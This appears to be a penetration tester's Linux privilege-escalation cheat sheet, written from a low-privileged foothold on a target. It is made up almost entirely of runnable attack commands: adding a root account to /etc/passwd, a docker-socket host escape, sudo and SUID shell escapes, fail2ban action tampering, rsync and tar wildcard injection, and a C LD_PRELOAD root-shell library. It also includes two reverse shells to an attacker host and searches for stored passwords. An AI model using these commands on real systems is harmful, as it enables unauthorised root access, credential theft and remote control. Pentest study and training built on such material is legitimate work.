PE Scripts — Linux privilege-escalation notes (every command below assumes a foothold as a low-privileged user on the target)

Other useful scripts

Capabilities (in the output look for binaries carrying `cap_setuid`, `cap_setgid` or `cap_dac_override` with `+ep`; GTFOBins lists the matching escalation per binary)

> getcap -r / 2>/dev/null

Create a root (uid 0) account by appending to /etc/passwd — only possible when /etc/passwd itself is writable; a non-`x` password field is checked directly, so the hash does not need to be in /etc/shadow

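# `hacker:pass123` — generate the MD5-crypt hash on the spot instead of trusting a pasted one
# (if openssl is missing on the target, run `openssl passwd -1 pass123` on your own box and paste the result);
# the shell must be single-quoted-free so $(...) expands; afterwards `su hacker` (or ssh hacker@target)
> echo "hacker:$(openssl passwd -1 pass123):0:0:root:/root:/bin/bash" >> /etc/passwd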

cron & background processes

  • cron jobs
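# grep -r instead of cat: /etc/cron* also matches the cron.d/ cron.daily/ ... directories,
# which cat skips (the error was hidden by 2>/dev/null), so their job files were never shown
> grep -rv "^#" /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root 2>/dev/null
# permissions matter: a writable job file or a writable script referenced by one is the PE vector
> ls -al /etc/cron* /etc/at*
> crontab -l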

docker

# check which image is available
> docker images
# PE via the image: requires write access to /var/run/docker.sock (membership of the docker group is effectively root); any locally available image works — the host root filesystem is mounted at /host and the chroot gives a root shell on the host
> docker -H unix:///var/run/docker.sock run -v /:/host -it {image_name} chroot /host /bin/bash
  • Curl can be used with a Unix socket to talk to the Docker daemon
# https://gist.github.com/PwnPeter/3f0a678bf44902eae07486c9cc589c25
> curl --unix-socket /var/run/docker.sock http://localhost/images/json

Shell escapes (run them through sudo or a SUID/capability-bearing copy of the binary — see GTFOBins; on their own they only spawn a shell as the current user)

# find
> sudo /usr/bin/find . -exec /bin/bash \; -quit

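# perl — only escalates when perl runs as root via sudo or carries cap_setuid (check getcap);
# die on a failed setuid(0) instead of silently dropping into an unprivileged shell
> perl -e 'use POSIX qw(setuid); POSIX::setuid(0) or die "setuid(0) failed: $!\n"; exec "/bin/sh";'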

# ed
https://www.hackingarticles.in/linux-for-pentester-ed-privilege-escalation/

# mail
> sudo mail --exec='!/bin/bash'

# awk (prefix with `sudo`, or use the SUID copy; plain awk just gives a shell as the current user)
> awk "BEGIN {system(\"/bin/sh\")}"

fail2ban

# check for fail2ban process
> ps aux | grep fail2ban
# check write permission on the action file (any writable action file under /etc/fail2ban/action.d that an active jail uses works; also check ownership of /etc/fail2ban and jail.local)
> ls -ls /etc/fail2ban/action.d/iptables-multiport.conf

# modify the ban/unban actions; fail2ban only reads action files at (re)start, so the service has to be restarted (via sudo, a cron job, or by waiting for a scheduled restart) before the edited action fires
#actionban = <iptables> -I f2b-<name> 1 -s <ip> -j <blocktype>
actionban = chmod +s /bin/bash

#actionunban = <iptables> -D f2b-<name> -s <ip> -j <blocktype>
actionunban = chmod +s /bin/bash
  • trigger a ban: fail ssh logins as root from your IP until maxretry is reached (see jail.conf / jail.local for maxretry and findtime); once the action has run, `/bin/bash -p` gives a root shell

files to check

# shell history: ~/.bash_history (also ~/.zsh_history, ~/.mysql_history, ~/.python_history — a readable root history often contains credentials)
# firewall rules: /etc/ufw/user.rules

find

# Find all `SUID` binaries (the four forms below are equivalent; use `-perm -2000` for SGID, then compare the list against GTFOBins)
> find / -perm /4000 -type f -exec ls -ld {} \; 2>/dev/null
> find / -perm -u=s -type f -exec ls -ld {} \; 2>/dev/null
> find / -perm -4000 2>/dev/null
> find / -perm -u=s -type f 2>/dev/null

# Find all files `by owner` (yash is an example — substitute the target user, or use `-group <g>`)
> find / -type f -user yash 2>/dev/null

# Find `writable directories` (add `-perm -o+w` for world-writable ones; /proc, /tmp and /dev/shm are expected noise)
> find / -type d -writable -print 2>/dev/null

# Find passwords (zabbix is an example; also try /etc, /var/www, /opt and application config dirs, and widen the pattern to `grep -iE 'passw(or)?d|secret|token'`)
> grep -iR 'password' /etc/zabbix/ 2>/dev/null

# Find files modified after a date (use the box's install or last-patch date; /usr excluding /usr/lib is a good first pass for custom binaries and scripts)
> find /usr/ -type f -newermt '2022-01-01' -ls 2>/dev/null
> find /usr/ -type f -newermt '2022-02-01' -not -path "/usr/lib/*" -ls 2>/dev/null

grep

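# exclude the pseudo-filesystems, otherwise grep hangs on /proc and /dev and floods stderr
> grep -rlw '<pattern>' / --exclude-dir={proc,sys,dev,run} 2>/dev/null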

Internal ports

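# listening TCP/UDP sockets with owning PID/program (-p needs root to show other users' processes);
# `-ano` on Linux only adds timer info and no process names. ss is the replacement where netstat is gone.
> netstat -tulpn 2>/dev/null || ss -tulpn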

Kernel exploits

  • Extract every kernel version the lucyoa repo has exploits for, then compare with `uname -r`; kernel exploits can crash the host, so try them last
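# -fsSL: fail on HTTP errors and show them instead of hiding everything with 2>/dev/null.
# The filter used to be grep -v "^\d\.\d$": GNU grep has no \d outside -P, so it never matched
# and bare major.minor entries (e.g. "2.6") plus the empty line from tr were kept.
> curl -fsSL https://raw.githubusercontent.com/lucyoa/kernel-exploits/master/README.md | grep "Kernels: " | cut -d ":" -f 2 | cut -d "<" -f 1 | tr -d "," | tr ' ' '\n' | grep -Ev '^([0-9]\.[0-9])?$' | sort -u -r | tr '\n' ' '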

Link hijacking (point a path that a privileged process reads or writes at a file you control; `-f` replaces an existing link, `-n` stops ln from descending into an existing symlinked directory)

> ln -fns <evil> <dst>

proc

  • Can be used to enumerate a process's command line, environment (often holds credentials) and state; note /proc/cmdline is the kernel boot line, per-process data lives under /proc/<pid>/ (e.g. /proc/<pid>/environ) and is readable only for processes you own unless hidepid is off
/proc/self/environ
/proc/self/stat
/proc/cmdline
/proc/<id>/cmdline

pkexec

  • Check that pkexec is SUID root (`ls -l $(which pkexec)`)
  • Check whether your user or one of your groups is listed as AdminIdentities in the polkit config (sudo/wheel/adm are common); that is the identity polkit will ask a password for
> cat /etc/polkit-1/localauthority.conf.d/*
> pkexec "/bin/sh"
# session 1
> echo $$ #Step1: Get current PID
> pkexec "/bin/bash" #Step 3, execute pkexec
#Step 5: if the authentication in session 2 succeeds, session 1 gets a root shell (polkit still needs a password it accepts — normally your own, when you are an admin identity)

# session 2
> pkttyagent --process <PID of session1> #Step 2, attach pkttyagent to session1
#Step 4, you will be asked in this session to authenticate to pkexec

rsync (wildcard injection: a root job runs rsync with an unquoted `*.*` glob in a directory you can write to, so a filename that looks like an option is parsed by rsync)

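# the privileged job (run by root, e.g. from cron) looks like this — it is NOT something we run:
#   rsync --ignore-existing -t *.* user@<ip>:/backups
# build the payload: the base64 must be generated for YOUR <ip>/port, not copied from another box
> PAYLOAD=$(echo 'bash -i >& /dev/tcp/<ip>/5555 0>&1' | base64 | tr -d '\n')
> echo "echo $PAYLOAD|base64 -d|bash" > e.sh
# a file named "-e sh e.sh" matches *.* and rsync parses it as -e "sh e.sh" (remote-shell command) — our script runs as root
> touch -- '-e sh e.sh'
> chmod +x e.sh
> chmod +x -- '-e sh e.sh'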

socat

  • If a root process exposes a shell through a UNIX socket via socat, anything written to that socket runs as root; afterwards run `/tmp/bash -p` (plain /tmp/bash drops the SUID privilege)
> echo "cp /bin/bash /tmp/bash; chmod +s /tmp/bash; chmod +x /tmp/bash;" | socat - UNIX-CLIENT:/tmp/synapse_commander.s

sudo

  • Check commands you can execute with sudo
> sudo -l

# e.g. `service` permitted via sudo: the relative path escapes the service directory and executes /bin/bash (GTFOBins `service`)
> sudo -u {priv-user} /usr/sbin/service ../../../bin/bash

sudoer

  • create a sudoers drop-in and copy it into /etc/sudoers.d (you need some way to write there as root); sudo silently ignores drop-ins that are not mode 0440 / root-owned or whose name contains `.` or `~`
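> echo "<user>  ALL=(ALL:ALL) NOPASSWD:ALL" > <user>
# 0440 is mandatory (sudo refuses writable drop-ins); visudo -c validates the syntax so a typo cannot lock sudo up
> cp <user> /etc/sudoers.d/ && chmod 0440 /etc/sudoers.d/<user> && visudo -cf /etc/sudoers.d/<user>
> sudo su -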

sudoedit (no commands recorded yet — see GTFOBins for sudoedit escapes)

SUID/SGID

> chmod u+s /bin/bash

# same via a command-injection point in a web app (URL-encoded: `+` is a space, `%2b` is the literal `+`)
> `chmod+u%2bs+/bin/bash`

# e.g -rwsr-xr-x 1 root   root    35K Jan 18  2018 /usr/bin/env
# -p: privileged mode — bash resets the effective uid to the real uid at startup unless -p is given, so a SUID bash (or bash started from a SUID env) is useless without it
> env bash -p
> bash -p

sudo LD_PRELOAD (only works when `sudo -l` shows `env_keep += LD_PRELOAD`, so sudo passes the variable through to the allowed command)

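// Shared object to preload into a sudo-run command: _init executes before the
// target's main() (the library is built with -nostartfiles so our _init is the
// one the loader calls), drops LD_PRELOAD from the environment and spawns a
// root shell. Requires sudo to keep LD_PRELOAD (env_keep in sudoers).
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>   /* setuid/setgid prototypes — implicit declarations are an error on recent gcc */

void _init() {
    /* the child shell must not preload us again, or every command it runs would re-enter _init */
    unsetenv("LD_PRELOAD");
    /* if we are not actually root (e.g. LD_PRELOAD was not kept) say so instead of
       silently handing back an unprivileged shell */
    if (setgid(0) != 0 || setuid(0) != 0) {
        perror("setuid/setgid");
        return;
    }
    system("/bin/bash");
}

// compile: gcc -fPIC -shared -o shell.so shell.c -nostartfiles
// load:    sudo LD_PRELOAD=/tmp/shell.so <command allowed in sudo -l>
//          (absolute path to the .so; the command itself can be anything sudo permits)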

tar wildcard injection (root runs `tar ... *` in a directory you can write to; filenames starting with `--` are expanded by the glob and parsed by tar as options)

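# attacker listener — set these first (nc -lvnp "$lport" on the attacking box)
lhost=10.4.36.159
lport=5555
# reverse shell without nc -e: the FIFO carries the listener's input into /bin/sh
echo "mkfifo /tmp/lhennp; nc $lhost $lport 0</tmp/lhennp | /bin/sh >/tmp/lhennp 2>&1; rm /tmp/lhennp" > shell.sh
# two files whose names become tar options once the root job's wildcard expands them:
# --checkpoint=1 makes tar fire a checkpoint after the first record, --checkpoint-action runs our script
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1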